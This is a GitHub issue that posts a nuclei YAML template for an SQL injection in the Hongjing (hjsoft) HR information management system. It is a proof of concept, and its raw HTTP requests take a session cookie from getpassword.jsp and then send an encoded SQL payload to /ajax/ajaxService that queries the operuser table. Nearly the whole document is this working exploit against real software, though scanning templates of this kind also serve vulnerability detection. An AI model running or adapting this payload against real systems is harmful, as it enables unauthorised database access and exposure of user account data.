### ISSUE TITLE
add hjsoft poc hjsoft-hr-system-sqli

### ISSUE THREAD

**Issue by Tripse** [Co5mos/nuclei-tps#5]
```yaml
id: hjsof-hr-system-sqli
info:
  name: hjsoft-hr-system-sqli
  author: leadlife
  severity: critical
  description: 宏景人力资源信息管理系统 ajaxService SQL 注入漏洞
  reference:
    - https://
  tags: hjsoft,sqli
http:
  - raw:
      - |+
        GET /templates/index/getpassword.jsp HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8
        Connection: close



      - |-
        POST /ajax/ajaxService HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8
        Cookie: {{get_cookie}}
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 327

        __type=extTrans&__xml=%7B%22functionId%22%3A%22151211001137%22%2C%22sql%22%3A%22select~20sys.fn_sqlvarbasetostr(HASHBYTES('MD5','{{81532}}'))~20a~30~31~30~30~2c~31~20a~30~31~30~31~2c~31~20b~30~31~31~30~2c~31~20e~30~31~32~32~2c~31~20e~30~31a~31~2c~31~20dbase~2c~31~20a~30~30~30~30~20from~20operuser%22%2C%22nbase%22%3A%221%22%7D

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200"
          - "contains(body_2,'sessionHM')"

    extractors:
      - type: regex
        name: get_cookie
        internal: true         
        part: header_1
        regex:
          - 'Set-Cookie: (.+?);'
```
